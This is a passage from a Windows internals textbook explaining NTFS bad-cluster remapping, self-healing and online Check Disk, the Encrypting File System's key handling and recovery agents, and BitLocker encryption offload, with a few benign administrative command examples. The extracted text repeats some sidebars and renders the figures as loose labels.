before the cluster went bad. When it receives a bad-sector error, NTFS reassigns the cluster containing
the sector to its bad-cluster file, BadClus. This prevents the bad cluster from being allocated to an-
other file. NTFS then allocates a new cluster for the file and changes the file’s VCN-to-LCN mappings to
point to the new cluster. This bad-cluster remapping (introduced earlier in this chapter) is illustrated in
Figure 11-64. Cluster number 1357, which contains the bad sector, must be replaced by a good cluster.
704
CHAPTER 11
Caching and file systems
Standard
information
0
1
2
1355
1356
1357
File name
Data
Bad
3
4
5
1588
1589
1590
VCN
User
file
LCN
1355
1588
3
3
0
3
Starting
VCN
Starting
LCN
Number of
clusters
FIGURE 11-64 MFT record for a user file with a bad cluster.
Bad-sector errors are undesirable, but when they do occur, the combination of NTFS and the
volume manager provides the best possible solution. If the bad sector is on a redundant volume,
the volume manager recovers the data and replaces the sector if it can. If it can’t replace the sector,
it returns a warning to NTFS, and NTFS replaces the cluster containing the bad sector.
If the volume isn’t configured as a redundant volume, the data in the bad sector can’t be recovered.
When the volume is formatted as a FAT volume and the volume manager can’t recover the data, read-
ing from the bad sector yields indeterminate results. If some of the file system’s control structures re-
side in the bad sector, an entire file or group of files (or potentially, the whole disk) can be lost. At best,
some data in the affected file (often, all the data in the file beyond the bad sector) is lost. Moreover, the
FAT file system is likely to reallocate the bad sector to the same or another file on the volume, causing
the problem to resurface.
Like the other file systems, NTFS can’t recover data from a bad sector without help from a volume
manager. However, NTFS greatly contains the damage a bad sector can cause. If NTFS discovers the
bad sector during a read operation, it remaps the cluster the sector is in, as shown in Figure 11-65. If the
volume isn’t configured as a redundant volume, NTFS returns a data read error to the calling program.
Although the data that was in that cluster is lost, the rest of the file—and the file system—remains
intact; the calling program can respond appropriately to the data loss, and the bad cluster won’t be
reused in future allocations. If NTFS discovers the bad cluster on a write operation rather than a read,
NTFS remaps the cluster before writing and thus loses no data and generates no error.
The same recovery procedures are followed if file system data is stored in a sector that goes bad.
If the bad sector is on a redundant volume, NTFS replaces the cluster dynamically, using the data
recovered by the volume manager. If the volume isn’t redundant, the data can’t be recovered, so NTFS
sets a bit in the Volume metadata file that indicates corruption on the volume. The NTFS Chkdsk utility
checks this bit when the system is next rebooted, and if the bit is set, Chkdsk executes, repairing the file
system corruption by reconstructing the NTFS metadata.
CHAPTER 11
Caching and file systems
705
Standard
information
0
1357
File name
$Bad alternate data stream
Bad
VCN
Bad-
cluster
file
LCN
1357
1
0
Starting
VCN
Starting
LCN
Number of
clusters
Standard
information
0
1
2
1355
1356
1049
File name
$Data
3
4
5
1588
1589
1590
VCN
User
file
LCN
1355
1588
2
3
0
1049
1
1588
3
3
2
Starting
VCN
Starting
LCN
Number of
clusters
FIGURE 11-65 Bad-cluster remapping.
In rare instances, file system corruption can occur even on a fault-tolerant disk configuration. A
double error can destroy both file system data and the means to reconstruct it. If the system crashes
while NTFS is writing the mirror copy of an MFT file record—of a file name index or of the log file, for
example—the mirror copy of such file system data might not be fully updated. If the system were re-
booted and a bad-sector error occurred on the primary disk at exactly the same location as the incom-
plete write on the disk mirror, NTFS would be unable to recover the correct data from the disk mirror.
NTFS implements a special scheme for detecting such corruptions in file system data. If it ever finds an
inconsistency, it sets the corruption bit in the volume file, which causes Chkdsk to reconstruct the NTFS
metadata when the system is next rebooted. Because file system corruption is rare on a fault-tolerant
disk configuration, Chkdsk is seldom needed. It is supplied as a safety precaution rather than as a first-
line data recovery strategy.
The use of Chkdsk on NTFS is vastly different from its use on the FAT file system. Before writing
anything to disk, FAT sets the volume’s dirty bit and then resets the bit after the modification is com-
plete. If any I/O operation is in progress when the system crashes, the dirty bit is left set and Chkdsk
runs when the system is rebooted. On NTFS, Chkdsk runs only when unexpected or unreadable file
system data is found, and NTFS can’t recover the data from a redundant volume or from redundant
file system structures on a single volume. (The system boot sector is duplicated—in the last sector
706
CHAPTER 11
Caching and file systems
of a volume—as are the parts of the MFT (MftMirr) required for booting the system and running
the NTFS recovery procedure. This redundancy ensures that NTFS will always be able to boot and
recover itself.)
Table 11-11 summarizes what happens when a sector goes bad on a disk volume formatted for one of
the Windows-supported file systems according to various conditions we’ve described in this section.
TABLE 11-11 Summary of NTFS data recovery scenarios
Scenario
With a Disk That Supports Bad-Sector
Remapping and Has Spare Sectors
With a Disk That Does Not Perform Bad-
Sector Remapping or Has No Spare Sectors
Fault-tolerant
volume1
1. Volume manager recovers the data.
2. Volume manager performs bad-sector
replacement.
3.
File system remains unaware of the error.
1. Volume manager recovers the data.
2. Volume manager sends the data and a
bad-sector error to the file system.
3.
NTFS performs cluster remapping.
Non-fault-
tolerant volume
1. Volume manager can’t recover the data.
2. Volume manager sends a bad-sector error
to the file system.
3.
NTFS performs cluster remapping.
Data is lost.2
1. Volume manager can’t recover the data.
2. Volume manager sends a bad-sector error
to the file system.
3.
NTFS performs cluster remapping.
Data is lost.
1 A fault-tolerant volume is one of the following: a mirror set (RAID-1) or a RAID-5 set.
2 In a write operation, no data is lost: NTFS remaps the cluster before the write.
If the volume on which the bad sector appears is a fault-tolerant volume—a mirrored (RAID-1) or
RAID-5 / RAID-6 volume—and if the hard disk is one that supports bad-sector replacement (and that
hasn’t run out of spare sectors), it doesn’t matter which file system you’re using (FAT or NTFS). The vol-
ume manager replaces the bad sector without the need for user or file system intervention.
If a bad sector is located on a hard disk that doesn’t support bad sector replacement, the file system
is responsible for replacing (remapping) the bad sector or—in the case of NTFS—the cluster in which
the bad sector resides. The FAT file system doesn’t provide sector or cluster remapping. The benefits of
NTFS cluster remapping are that bad spots in a file can be fixed without harm to the file (or harm to the
file system, as the case may be) and that the bad cluster will never be used again.
Self-healing
With today’s multiterabyte storage devices, taking a volume offline for a consistency check can result in
a service outage of many hours. Recognizing that many disk corruptions are localized to a single file or
portion of metadata, NTFS implements a self-healing feature to repair damage while a volume remains
online. When NTFS detects corruption, it prevents access to the damaged file or files and creates a
system worker thread that performs Chkdsk-like corrections to the corrupted data structures, allow-
ing access to the repaired files when it has finished. Access to other files continues normally during this
operation, minimizing service disruption.
You can use the fsutil repair set command to view and set a volume’s repair options, which are
summarized in Table 11-12. The Fsutil utility uses the FSCTL_SET_REPAIR file system control code to set
these settings, which are saved in the VCB for the volume.
CHAPTER 11
Caching and file systems
707
TABLE 11-12 NTFS self-healing behaviors
Flag
Behavior
SET_REPAIR_ENABLED
Enable self-healing for the volume.
SET_REPAIR_WARN_ABOUT_DATA_LOSS
If the self-healing process is unable to fully recover a file, specifies whether
the user should be visually warned.
SET_REPAIR_DISABLED_AND_BUGCHECK
_ON_CORRUPTION
If the NtfsBugCheckOnCorrupt NTFS registry value was set by using fsutil
behavior set NtfsBugCheckOnCorrupt 1 and this flag is set, the system will
crash with a STOP error 0x24, indicating file system corruption. This setting
is automatically cleared during boot time to avoid repeated reboot cycles.
In all cases, including when the visual warning is disabled (the default), NTFS will log any self-healing
operation it undertook in the System event log.
Apart from periodic automatic self-healing, NTFS also supports manually initiated self-healing
cycles (this type of self-healing is called proactive) through the FSCTL_INITIATE_REPAIR and FSCTL_
WAIT_FOR_REPAIR control codes, which can be initiated with the fsutil repair initiate and fsutil
repair wait commands. This allows the user to force the repair of a specific file and to wait until repair
of that file is complete.
To check the status of the self-healing mechanism, the FSCTL_QUERY_REPAIR control code or the
fsutil repair query command can be used, as shown here:
C:\>fsutil repair query c:
Self healing state on c: is: 0x9
Values: 0x1 - Enable general repair.
0x9 - Enable repair and warn about potential data loss.
0x10 - Disable repair and bugcheck once on first corruption.
Online check-disk and fast repair
Rare cases in which disk-corruptions are not managed by the NTFS file system driver (through self-heal-
ing, Log file service, and so on) require the system to run the Windows Check Disk tool and to put the vol-
ume offline. There are a variety of unique causes for disk corruption: whether they are caused by media
errors from the hard disk or transient memory errors, corruptions can happen in file system metadata. In
large file servers, which have multiple terabytes of disk space, running a complete Check Disk can require
days. Having a volume offline for so long in these kinds of scenarios is typically not acceptable.
Before Windows 8, NTFS implemented a simpler health model, where the file system volume was
either healthy or not (through the dirty bit stored in the VOLUME_INFORMATION attribute). In that
model, the volume was taken offline for as long as necessary to fix the file system corruptions and bring
the volume back to a healthy state. Downtime was directly proportional to the number of files in the
volume. Windows 8, with the goal of reducing or avoiding the downtime caused by file system corrup-
tion, has redesigned the NTFS health model and disk check.
The new model introduces new components that cooperate to provide an online check-disk tool and
to drastically reduce the downtime in case severe file-system corruption is detected. The NTFS file system
driver is able to identify multiple types of corruption during normal system I/O. If a corruption is detected,
708
CHAPTER 11
Caching and file systems
NTFS tries to self-heal it (see the previous paragraph). If it doesn’t succeed, the NTFS file system driver
writes a new corruption record to the Verify stream of the \Extend\RmMetadata\Repair file.
A corruption record is a common data structure that NTFS uses for describing metadata corruptions
and is used both in-memory and on-disk. A corruption record is represented by a fixed-size header,
which contains version information, flags, and uniquely represents the record type through a GUID, a
variable-sized description for the type of corruption that occurred, and an optional context.
After the entry has been correctly added, NTFS emits an ETW event through its own event provider
(named Microsoft-Windows-Ntfs-UBPM). This ETW event is consumed by the service control manager,
which will start the Spot Verifier service (more details about triggered-start services are available in
Chapter 10).
The Spot Verifier service (implemented in the Svsvc.dll library) verifies that the signaled corruption is
not a false positive (some corruptions are intermittent due to memory issues and may not be a result of
an actual corruption on disk). Entries in the Verify stream are removed while being verified by the Spot
Verifier. If the corruption (described by the entry) is not a false positive, the Spot Verifier triggers the
Proactive Scan Bit (P-bit) in the VOLUME_INFORMATION attribute of the volume, which will trigger
an online scan of the file system. The online scan is executed by the Proactive Scanner, which is run as a
maintenance task by the Windows task scheduler (the task is located in Microsoft\Windows\Chkdsk, as
shown in Figure 11-66) when the time is appropriate.
FIGURE 11-66 The Proactive Scan maintenance task.
CHAPTER 11
Caching and file systems
709
The Proactive scanner is implemented in the Untfs.dll library, which is imported by the Windows
Check Disk tool (Chkdsk.exe). When the Proactive Scanner runs, it takes a snapshot of the target volume
through the Volume Shadow Copy service and runs a complete Check Disk on the shadow volume.
The shadow volume is read-only; the check disk code detects this and, instead of directly fixing the
errors, uses the self-healing feature of NTFS to try to automatically fix the corruption. If it fails, it sends
a FSCTL_CORRUPTION_HANDLING code to the file system driver, which in turn creates an entry in the
Corrupt stream of the \Extend\RmMetadata\Repair metadata file and sets the volume’s dirty bit.
The dirty bit has a slightly different meaning compared to previous editions of Windows. The VOLUME
_INFORMATION attribute of the NTFS root namespace still contains the dirty bit, but also contains the
P-bit, which is used to require a Proactive Scan, and the F-bit, which is used to require a full check disk
due to the severity of a particular corruption. The dirty bit is set to 1 by the file system driver if the P-bit
or the F-bit are enabled, or if the Corrupt stream contains one or more corruption records.
If the corruption is still not resolved, at this stage there are no other possibilities to fix it when the
volume is offline (this does not necessarily require an immediate volume unmounting). The Spot Fixer
is a new component that is shared between the Check Disk and the Autocheck tool. The Spot Fixer
consumes the records inserted in the Corrupt stream by the Proactive scanner. At boot time, the
Autocheck native application detects that the volume is dirty, but, instead of running a full check disk,
it fixes only the corrupted entries located in the Corrupt stream, an operation that requires only a few
seconds. Figure 11-67 shows a summary of the different repair methodology implemented in the previ-
ously described components of the NTFS file system.
FIGURE 11-67 A scheme that describes the components that cooperate to provide online check disk
and fast corruption repair for NTFS volumes.
A Proactive scan can be manually started for a volume through the chkdsk /scan command. In the same
way, the Spot Fixer can be executed by the Check Disk tool using the spotfix command-line argument.
710
CHAPTER 11
Caching and file systems
EXPERIMENT: Testing the online disk check
You can test the online checkdisk by performing a simple experiment. Assuming that you would
like to execute an online checkdisk on the D: volume, start by playing a large video stream from
the D drive. In the meantime, open an administrative command prompt window and start an
online checkdisk through the following command:
C:\>chkdsk d: /scan
The type of the file system is NTFS.
Volume label is DATA.
Stage 1: Examining basic file system structure ...
4041984 file records processed.
File verification completed.
3778 large file records processed.
0 bad file records processed.
Stage 2: Examining file name linkage ...
Progress: 3454102 of 4056090 done; Stage: 85%; Total: 51%; ETA: 0:00:43 ..
You will find that the video stream won’t be stopped and continues to play smoothly. In case
the online checkdisk finds an error that it isn’t able to correct while the volume is mounted, it will
be inserted in the Corrupt stream of the Repair system file. To fix the errors, a volume dismount
is needed, but the correction will be very fast. In that case, you could simply reboot the machine
or manually execute the Spot Fixer through the command line:
C:\>chkdsk d: /spotfix
In case you choose to execute the Spot Fixer, you will find that the video stream will be inter-
rupted, because the volume needs to be unmounted.
Encrypted file system
Windows includes a full-volume encryption feature called Windows BitLocker Drive Encryption.
BitLocker encrypts and protects volumes from offline attacks, but once a system is booted, BitLocker’s
job is done. The Encrypting File System (EFS) protects individual files and directories from other au-
thenticated users on a system. When choosing how to protect your data, it is not an either/or choice
between BitLocker and EFS; each provides protection from specific—and nonoverlapping—threats.
Together, BitLocker and EFS provide a “defense in depth” for the data on your system.
The paradigm used by EFS is to encrypt files and directories using symmetric encryption (a single
key that is used for encrypting and decrypting the file). The symmetric encryption key is then encrypt-
ed using asymmetric encryption (one key for encryption—often referred to as the public key—and a
different key for decryption—often referred to as the private key) for each user who is granted access
to the file. The details and theory behind these encryption methods is beyond the scope of this book;
however, a good primer is available at https://docs.microsoft.com/en-us/windows/desktop/SecCrypto/
cryptography-essentials.
EXPERIMENT: Testing the online disk check
You can test the online checkdisk by performing a simple experiment. Assuming that you would
like to execute an online checkdisk on the D: volume, start by playing a large video stream from
the D drive. In the meantime, open an administrative command prompt window and start an
online checkdisk through the following command:
C:\>chkdsk d: /scan
The type of the file system is NTFS.
Volume label is DATA.
Stage 1: Examining basic file system structure ...
4041984 file records processed.
File verification completed.
3778 large file records processed.
0 bad file records processed.
Stage 2: Examining file name linkage ...
Progress: 3454102 of 4056090 done; Stage: 85%; Total: 51%; ETA: 0:00:43 ..
You will find that the video stream won’t be stopped and continues to play smoothly. In case
the online checkdisk finds an error that it isn’t able to correct while the volume is mounted, it will
be inserted in the Corrupt stream of the Repair system file. To fix the errors, a volume dismount
is needed, but the correction will be very fast. In that case, you could simply reboot the machine
or manually execute the Spot Fixer through the command line:
C:\>chkdsk d: /spotfix
In case you choose to execute the Spot Fixer, you will find that the video stream will be inter-
rupted, because the volume needs to be unmounted.
CHAPTER 11
Caching and file systems
711
EFS works with the Windows Cryptography Next Generation (CNG) APIs, and thus may be con-
figured to use any algorithm supported by (or added to) CNG. By default, EFS will use the Advanced
Encryption Standard (AES) for symmetric encryption (256-bit key) and the Rivest-Shamir-Adleman
(RSA) public key algorithm for asymmetric encryption (2,048-bit keys).
Users can encrypt files via Windows Explorer by opening a file’s Properties dialog box, clicking
Advanced, and then selecting the Encrypt Contents To Secure Data option, as shown in Figure 11-
68. (A file may be encrypted or compressed, but not both.) Users can also encrypt files via a command-
line utility named Cipher (%SystemRoot%\System32\Cipher.exe) or programmatically using Windows
APIs such as EncryptFile and AddUsersToEncryptedFile.
Windows automatically encrypts files that reside in directories that are designated as encrypted
directories. When a file is encrypted, EFS generates a random number for the file that EFS calls the file’s
File Encryption Key (FEK). EFS uses the FEK to encrypt the file’s contents using symmetric encryption. EFS
then encrypts the FEK using the user’s asymmetric public key and stores the encrypted FEK in the EFS
alternate data stream for the file. The source of the public key may be administratively specified to come
from an assigned X.509 certificate or a smartcard or can be randomly generated (which would then be
added to the user’s certificate store, which can be viewed using the Certificate Manager (%SystemRoot%\
System32\Certmgr.msc). After EFS completes these steps, the file is secure; other users can’t decrypt the
data without the file’s decrypted FEK, and they can’t decrypt the FEK without the user private key.
FIGURE 11-68 Encrypt files by using the Advanced Attributes dialog box.
Symmetric encryption algorithms are typically very fast, which makes them suitable for encrypting
large amounts of data, such as file data. However, symmetric encryption algorithms have a weakness:
You can bypass their security if you obtain the key. If multiple users want to share one encrypted file
protected only using symmetric encryption, each user would require access to the file’s FEK. Leaving
the FEK unencrypted would obviously be a security problem, but encrypting the FEK once would re-
quire all the users to share the same FEK decryption key—another potential security problem.
Keeping the FEK secure is a difficult problem, which EFS addresses with the public key–based half of
its encryption architecture. Encrypting a file’s FEK for individual users who access the file lets multiple
users share an encrypted file. EFS can encrypt a file’s FEK with each user’s public key and can store each
user’s encrypted FEK in the file’s EFS data stream. Anyone can access a user’s public key, but no one
712
CHAPTER 11
Caching and file systems
can use a public key to decrypt the data that the public key encrypted. The only way users can decrypt
a file is with their private key, which the operating system must access. A user’s private key decrypts the
user’s encrypted copy of a file’s FEK. Public key–based algorithms are usually slow, but EFS uses these
algorithms only to encrypt FEKs. Splitting key management between a publicly available key and a
private key makes key management a little easier than symmetric encryption algorithms do and solves
the dilemma of keeping the FEK secure.
Several components work together to make EFS work, as the diagram of EFS architecture in Figure 11-69
shows. EFS support is merged into the NTFS driver. Whenever NTFS encounters an encrypted file, NTFS
executes EFS functions that it contains. The EFS functions encrypt and decrypt file data as applications
access encrypted files. Although EFS stores an FEK with a file’s data, users’ public keys encrypt the FEK.
To encrypt or decrypt file data, EFS must decrypt the file’s FEK with the aid of CNG key management
services that reside in user mode.
User
User key store
Registry
Downlevel
client
Windows 10
client
Group policy
LSA
Kerberos
RPC client
NTFS
Disk
EFS service
EFS kernel
helper library
File I/O (plaintext)
Logon
EFS APIs
EFSRPC
EFSRPC
Settings
Keys
SC logon
PIN, cert
EFSRPC
forwarding
EFSRPC
FSCTLs
for
EFSRPC
Ciphertext
Kernel
SC logon
PIN, cert
Settings
CreateFile
LSA domain
policy store
EFS
recovery policy
EFS cache
User secrets
FIGURE 11-69 EFS architecture.
The Local Security Authority Subsystem (LSASS, %SystemRoot%\System32\Lsass.exe) manages
logon sessions but also hosts the EFS service (Efssvc.dll). For example, when EFS needs to decrypt a FEK
to decrypt file data a user wants to access, NTFS sends a request to the EFS service inside LSASS.
CHAPTER 11
Caching and file systems
713
Encrypting a file for the first time
The NTFS driver calls its EFS helper functions when it encounters an encrypted file. A file’s attributes re-
cord that the file is encrypted in the same way that a file records that it’s compressed (discussed earlier
in this chapter). NTFS has specific interfaces for converting a file from nonencrypted to encrypted form,
but user-mode components primarily drive the process. As described earlier, Windows lets you encrypt
a file in two ways: by using the cipher command-line utility or by checking the Encrypt Contents To
Secure Data check box in the Advanced Attributes dialog box for a file in Windows Explorer. Both
Windows Explorer and the cipher command rely on the EncryptFile Windows API.
EFS stores only one block of information in an encrypted file, and that block contains an entry for
each user sharing the file. These entries are called key entries, and EFS stores them in the data decryp-
tion field (DDF) portion of the file’s EFS data. A collection of multiple key entries is called a key ring
because, as mentioned earlier, EFS lets multiple users share encrypted files.
Figure 11-70 shows a file’s EFS information format and key entry format. EFS stores enough informa-
tion in the first part of a key entry to precisely describe a user’s public key. This data includes the user’s
security ID (SID) (note that the SID is not guaranteed to be present), the container name in which the
key is stored, the cryptographic provider name, and the asymmetric key pair certificate hash. Only the
asymmetric key pair certificate hash is used by the decryption process. The second part of the key entry
contains an encrypted version of the FEK. EFS uses the CNG to encrypt the FEK with the selected asym-
metric encryption algorithm and the user’s public key.
EFS information
Header
Data
decryption
field
Data
recovery
field
Version
Checksum
Number of DDF key entries
DDF key entry 1
DDF key entry 2
Number of DRF key entries
DRF key entry 1
Key entry
User SID
(S-1-5-21-...)
Container name
(ee341-2144-55ba...)
Provider name
(Microsoft Base Cryptographic Provider 1.0)
EFS certificate hash
(cb3e4e...)
Encrypted FEK
(03fe4f3c...)
FIGURE 11-70 Format of EFS information and key entries.
EFS stores information about recovery key entries in a file’s data recovery field (DRF). The format of
DRF entries is identical to the format of DDF entries. The DRF’s purpose is to let designated accounts, or
recovery agents, decrypt a user’s file when administrative authority must have access to the user’s data.
For example, suppose a company employee forgot his or her logon password. An administrator can
reset the user’s password, but without recovery agents, no one can recover the user’s encrypted data.
714
CHAPTER 11
Caching and file systems
Recovery agents are defined with the Encrypted Data Recovery Agents security policy of the local
computer or domain. This policy is available from the Local Security Policy MMC snap-in, as shown in
Figure 11-71. When you use the Add Recovery Agent Wizard (by right-clicking Encrypting File System
and then clicking Add Data Recovery Agent), you can add recovery agents and specify which private/
public key pairs (designated by their certificates) the recovery agents use for EFS recovery. Lsasrv (Local
Security Authority service, which is covered in Chapter 7 of Part 1) interprets the recovery policy when it
initializes and when it receives notification that the recovery policy has changed. EFS creates a DRF key
entry for each recovery agent by using the cryptographic provider registered for EFS recovery.
FIGURE 11-71 Encrypted Data Recovery Agents group policy.
A user can create their own Data Recovery Agent (DRA) certificate by using the cipher /r com-
mand. The generated private certificate file can be imported by the Recovery Agent Wizard and by the
Certificates snap-in of the domain controller or the machine on which the administrator should be able
to decrypt encrypted files.
As the final step in creating EFS information for a file, Lsasrv calculates a checksum for the DDF and
DRF by using the MD5 hash facility of Base Cryptographic Provider 1.0. Lsasrv stores the checksum’s
result in the EFS information header. EFS references this checksum during decryption to ensure that the
contents of a file’s EFS information haven’t become corrupted or been tampered with.
Encrypting file data
When a user encrypts an existing file, the following process occurs:
1.
The EFS service opens the file for exclusive access.
2.
All data streams in the file are copied to a plaintext temporary file in the system’s
temporary directory.
3.
A FEK is randomly generated and used to encrypt the file by using AES-256.
CHAPTER 11
Caching and file systems
715
4.
A DDF is created to contain the FEK encrypted by using the user’s public key. EFS automatically
obtains the user’s public key from the user’s X.509 version 3 file encryption certificate.
5.
If a recovery agent has been designated through Group Policy, a DRF is created to contain the
FEK encrypted by using RSA and the recovery agent’s public key.
6.
EFS automatically obtains the recovery agent’s public key for file recovery from the recov-
ery agent’s X.509 version 3 certificate, which is stored in the EFS recovery policy. If there are
multiple recovery agents, a copy of the FEK is encrypted by using each agent’s public key, and a
DRF is created to store each encrypted FEK.
Note The file recovery property in the certificate is an example of an enhanced
key usage (EKU) field. An EKU extension and extended property specify and limit
the valid uses of a certificate. File Recovery is one of the EKU fields defined by
Microsoft as part of the Microsoft public key infrastructure (PKI).
7.
EFS writes the encrypted data, along with the DDF and the DRF, back to the file. Because sym-
metric encryption does not add additional data, file size increase is minimal after encryption.
The metadata, consisting primarily of encrypted FEKs, is usually less than 1 KB. File size in bytes
before and after encryption is normally reported to be the same.
8.
The plaintext temporary file is deleted.
When a user saves a file to a folder that has been configured for encryption, the process is similar
except that no temporary file is created.
The decryption process
When an application accesses an encrypted file, decryption proceeds as follows:
1.
NTFS recognizes that the file is encrypted and sends a request to the EFS driver.
2.
The EFS driver retrieves the DDF and passes it to the EFS service.
3.
The EFS service retrieves the user’s private key from the user’s profile and uses it to decrypt the
DDF and obtain the FEK.
4.
The EFS service passes the FEK back to the EFS driver.
5.
The EFS driver uses the FEK to decrypt sections of the file as needed for the application.
Note When an application opens a file, only those sections of the file that the ap-
plication is using are decrypted because EFS uses cipher block chaining. The be-
havior is different if the user removes the encryption attribute from the file. In this
case, the entire file is decrypted and rewritten as plaintext.
716
CHAPTER 11
Caching and file systems
6.
The EFS driver returns the decrypted data to NTFS, which then sends the data to the requesting
application.
Backing up encrypted files
An important aspect of any file encryption facility’s design is that file data is never available in un-
encrypted form except to applications that access the file via the encryption facility. This restriction
particularly affects backup utilities, in which archival media store files. EFS addresses this problem by
providing a facility for backup utilities so that the utilities can back up and restore files in their encrypt-
ed states. Thus, backup utilities don’t have to be able to decrypt file data, nor do they need to encrypt
file data in their backup procedures.
Backup utilities use the EFS API functions OpenEncryptedFileRaw, ReadEncryptedFileRaw, WriteEncrypted
FileRaw, and CloseEncryptedFileRaw in Windows to access a file’s encrypted contents. After a backup
utility opens a file for raw access during a backup operation, the utility calls ReadEncryptedFileRaw to
obtain the file data. All the EFS backup utilities APIs work by issuing FSCTL to the NTFS file system. For
example, the ReadEncryptedFileRaw API first reads the EFS stream by issuing a FSCTL_ENCRYPTION
_FSCTL_IO control code to the NTFS driver and then reads all of the files streams (including the DATA
stream and optional alternate data streams); in case the stream is encrypted, the ReadEncryptedFileRaw
API uses the FSCTL_READ_RAW_ENCRYPTED control code to request the encrypted stream data to the
file system driver.
EXPERIMENT: Viewing EFS information
EFS has a handful of other API functions that applications can use to manipulate encrypted files.
For example, applications use the AddUsersToEncryptedFile API function to give additional users
access to an encrypted file and RemoveUsersFromEncryptedFile to revoke users’ access to an
encrypted file. Applications use the QueryUsersOnEncryptedFile function to obtain information
about a file’s associated DDF and DRF key fields. QueryUsersOnEncryptedFile returns the SID,
certificate hash value, and display information that each DDF and DRF key field contains. The fol-
lowing output is from the EFSDump utility, from Sysinternals, when an encrypted file is specified
as a command-line argument:
C:\Andrea>efsdump Test.txt
EFS Information Dumper v1.02
Copyright (C) 1999 Mark Russinovich
Systems Internals - http://www.sysinternals.com
C:\Andrea\Test.txt:
DDF Entries:
WIN-46E4EFTBP6Q\Andrea:
Andrea(Andrea@WIN-46E4EFTBP6Q)
Unknown user:
Tony(Tony@WIN-46E4EFTBP6Q)
DRF Entry:
Unknown user:
EFS Data Recovery
EXPERIMENT: Viewing EFS information
EFS has a handful of other API functions that applications can use to manipulate encrypted files.
For example, applications use the AddUsersToEncryptedFile API function to give additional users
access to an encrypted file and RemoveUsersFromEncryptedFile to revoke users’ access to an
encrypted file. Applications use the QueryUsersOnEncryptedFile function to obtain information
about a file’s associated DDF and DRF key fields. QueryUsersOnEncryptedFile returns the SID,
certificate hash value, and display information that each DDF and DRF key field contains. The fol-
lowing output is from the EFSDump utility, from Sysinternals, when an encrypted file is specified
as a command-line argument:
C:\Andrea>efsdump Test.txt
EFS Information Dumper v1.02
Copyright (C) 1999 Mark Russinovich
Systems Internals - http://www.sysinternals.com
C:\Andrea\Test.txt:
DDF Entries:
WIN-46E4EFTBP6Q\Andrea:
Andrea(Andrea@WIN-46E4EFTBP6Q)
Unknown user:
Tony(Tony@WIN-46E4EFTBP6Q)
DRF Entry:
Unknown user:
EFS Data Recovery
CHAPTER 11
Caching and file systems
717
You can see that the file Test.txt has two DDF entries for the users Andrea and Tony and one
DRF entry for the EFS Data Recovery agent, which is the only recovery agent currently registered
on the system. You can use the cipher tool to add or remove users in the DDF entries of a file. For
example, the command
cipher /adduser /user:Tony Test.txt
enables the user Tony to access the encrypted file Test.txt (adding an entry in the DDF of the file).
Copying encrypted files
When an encrypted file is copied, the system doesn’t decrypt the file and re-encrypt it at its destina-
tion; it just copies the encrypted data and the EFS alternate data stream to the specified destination.
However, if the destination does not support alternate data streams—if it is not an NTFS volume (such
as a FAT volume) or is a network share (even if the network share is an NTFS volume)—the copy cannot
proceed normally because the alternate data streams would be lost. If the copy is done with Explorer, a
dialog box informs the user that the destination volume does not support encryption and asks the user
whether the file should be copied to the destination unencrypted. If the user agrees, the file will be de-
crypted and copied to the specified destination. If the copy is done from a command prompt, the copy
command will fail and return the error message “The specified file could not be encrypted.”
BitLocker encryption offload
The NTFS file system driver uses services provided by the Encrypting File System (EFS) to perform
file encryption and decryption. These kernel-mode services, which communicate with the user-mode
encrypting file service (Efssvc.dll), are provided to NTFS through callbacks. When a user or application
encrypts a file for the first time, the EFS service sends a FSCTL_SET_ENCRYPTION control code to the
NTFS driver. The NTFS file system driver uses the “write” EFS callback to perform in-memory encryp-
tion of the data located in the original file. The actual encryption process is performed by splitting the
file content, which is usually processed in 2-MB blocks, in small 512-byte chunks. The EFS library uses
the BCryptEncrypt API to actually encrypt the chunk. As previously mentioned, the encryption engine
is provided by the Kernel CNG driver (Cng.sys), which supports the AES or 3DES algorithms used by
EFS (along with many more). As EFS encrypts each 512-byte chunk (which is the smallest physical size
of standard hard disk sectors), at every round it updates the IV (initialization vector, also known as salt
value, which is a 128-bit number used to provide randomization to the encryption scheme), using the
byte offset of the current block.
In Windows 10, encryption performance has increased thanks to BitLocker encryption ofoad. When
BitLocker is enabled, the storage stack already includes a device created by the Full Volume Encryption
Driver (Fvevol.sys), which, if the volume is encrypted, performs real-time encryption/decryption on
physical disk sectors; otherwise, it simply passes through the I/O requests.
You can see that the file Test.txt has two DDF entries for the users Andrea and Tony and one
DRF entry for the EFS Data Recovery agent, which is the only recovery agent currently registered
on the system. You can use the cipher tool to add or remove users in the DDF entries of a file. For
example, the command
cipher /adduser /user:Tony Test.txt
enables the user Tony to access the encrypted file Test.txt (adding an entry in the DDF of the file).
718
CHAPTER 11
Caching and file systems
The NTFS driver can defer the encryption of a file by using IRP Extensions. IRP Extensions are pro-
vided by the I/O manager (more details about the I/O manager are available in Chapter 6 of Part 1) and
are a way to store different types of additional information in an IRP. At file creation time, the EFS driver
probes the device stack to check whether the BitLocker control device object (CDO) is present (by us-
ing the IOCTL_FVE_GET_CDOPATH control code), and, if so, it sets a flag in the SCB, indicating that the
stream can support encryption offload.
Every time an encrypted file is read or written, or when a file is encrypted for the first time, the NTFS
driver, based on the previously set flag, determines whether it needs to encrypt/decrypt each file block.
In case encryption offload is enabled, NTFS skips the call to EFS; instead, it adds an IRP extension to the
IRP that will be sent to the related volume device for performing the physical I/O. In the IRP extension,
the NTFS file system driver stores the starting virtual byte offset of the block of the file that the stor-
age driver is going to read or write, its size, and some flags. The NTFS driver finally emits the I/O to the
related volume device by using the IoCallDriver API.
The volume manager will parse the IRP and send it to the correct storage driver. The BitLocker driver
recognizes the IRP extension and encrypts the data that NTFS has sent down to the device stack, using
its own routines, which operate on physical sectors. (Bitlocker, as a volume filter driver, doesn’t imple-
ment the concept of files and directories.) Some storage drivers, such as the Logical Disk Manager
driver (VolmgrX.sys, which provides dynamic disk support) are filter drivers that attach to the volume
device objects. These drivers reside below the volume manager but above the BitLocker driver, and
they can provide data redundancy, striping, or storage virtualization, characteristics which are usually
implemented by splitting the original IRP into multiple secondary IRPs that will be emitted to differ-
ent physical disk devices. In this case, the secondary I/Os, when intercepted by the BitLocker driver, will
result in data encrypted by using a different salt value that would corrupt the file data.
IRP extensions support the concept of IRP propagation, which automatically modifies the file virtual
byte offset stored in the IRP extension every time the original IRP is split. Normally, the EFS driver encrypts
file blocks on 512-byte boundaries, and the IRP can’t be split on an alignment less than a sector size. As a
result, BitLocker can correctly encrypt and decrypt the data, ensuring that no corruption will happen.
Many of BitLocker driver’s routines can’t tolerate memory failures. However, since IRP extension is
